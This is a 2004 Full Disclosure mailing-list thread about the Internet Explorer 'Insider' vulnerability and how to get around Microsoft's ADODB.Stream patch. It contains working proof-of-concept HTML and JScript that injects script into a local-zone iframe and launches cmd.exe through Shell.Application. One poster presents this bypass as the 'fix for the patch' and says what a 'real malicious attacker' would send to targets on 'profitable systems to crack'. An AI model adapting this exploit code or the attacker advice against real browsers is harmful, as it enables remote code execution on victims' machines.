Full Disclosure mailing list archives
RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
From: <liudieyu () umbrella name>
Date: Sat, 3 Jul 2004 15:24:55 -0000
at the very beginning, using shell.application is not "another" way - it's actually the only solution available for the general public. most of profitable systems to crack today have norton.antivirus.enterprise.xxxx installed - which means MS-ITS& Adodb.Stream are disabled. i must admit, norton.antivirus did stop the insider exploit - this time. so, a real malicious attacker with normal intel would never simply copy the public exploit(which involves MS-ITS and ADODB.STREAM) and send it to his targets - he'll use shell.application instead of adodb.stream. the most weired thing is the following fact: norton is securing windows faster than microsoft. (the latter is OS PRODUCER, while the former is ANTIVIRUS) Jelmer <jkuperus () planet nl> said:
Well it's not quite as easy as you make it sound I think you only took a look at http-equiv's example I posted to full disclosure and based your post on that. You see this: --snip-- <iframe src="c:\windows\web\tip.htm" style="width:400px;height:200px;"></iframe> <textarea id="code" style="display:none;"> injected. <script language="JScript" DEFER> alert('attempting injection'); var obj=new ActiveXObject("Shell.Application"); obj.ShellExecute("cmd.exe","/c pause"); </script> </textarea> <script language="javascript"> function doit() { document.frames[0].document.body.insertAdjacentHTML('afterBegin', document.all.code.value); } setTimeout("doit()", 2000); </script> --snip-- Doesn't work, It gives an access denied exception But this.. --snip-- <iframe src="shell:windows\web\tip.htm" style="width:400px;height:200px;"></iframe> <textarea id="code" style="display:none;"> injected. <script language="JScript" DEFER> alert('attempting injection'); var obj=new ActiveXObject("Shell.Application"); obj.ShellExecute("cmd.exe","/c pause"); </script> </textarea> <script language="javascript"> function doit() { document.frames[0].document.body.insertAdjacentHTML('afterBegin', document.all.code.value); } setTimeout("doit()", 2000); </script> --snip-- ..does, notice the subtle difference. The iframe in the 2nd example is set to shell:windows\web\tip.htm Instead of the hard coded c:\windows\web\tip.htm And it works. It was http-equiv whom probably by a mixture of luck and gut instinct thru experience found this out when we where doing some mailing back and forth to tackle some unrelated problem If you'd actually tried to exploit it you would have known this -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of liudieyu () umbrella name Sent: zaterdag 3 juli 2004 3:28 To: bugtraq () securityfocus com; NTBugtraq () listserv ntbugtraq com; full-disclosure () lists netsys com Subject: [Full-disclosure] THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH FROM: Liu Die Yu - http://umbrella.name/ TO : bugtraq () securityfocus com, NTBugtraq () listserv ntbugtraq com, full-disclosure () lists netsys com SUBJ: THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH DATE: 2004/07/03 UTC+800 BODY: [background] the latest 0day remote compromise exploit for internet explorer was found being used in the wild. :-) "the-insider" exploit was first noticed by the-insider: http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclos ure_message-2004060050 and then documented by jelmer: http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclos ure_message-2004060124 http://62.131.86.111/analysis.htm microsoft just released: Critical Update for Microsoft Data Access Components - Disable ADODB.Stream object from Internet Explorer (KB870669) http://www.microsoft.com/downloads/details.aspx?FamilyID=4D056748-C538-46F6- B7C8-2FBFD0D237E3&DisplayLang=en which kills the old exploit. [FIX FOR THE PATCH] use Shell.Application instead. [service] both "attack service"(finding bugs) and "defense service"(securing systems): http://umbrella.name/ [greetings] malware( http://www.malware.com/ ) who found Shell.Application. [signature] LIUDIEYU liudieyu AT umbrella . name
-- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH liudieyu (Jul 02)
- RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH Jelmer (Jul 03)
- RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH liudieyu (Jul 03)
- RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH Jelmer (Jul 03)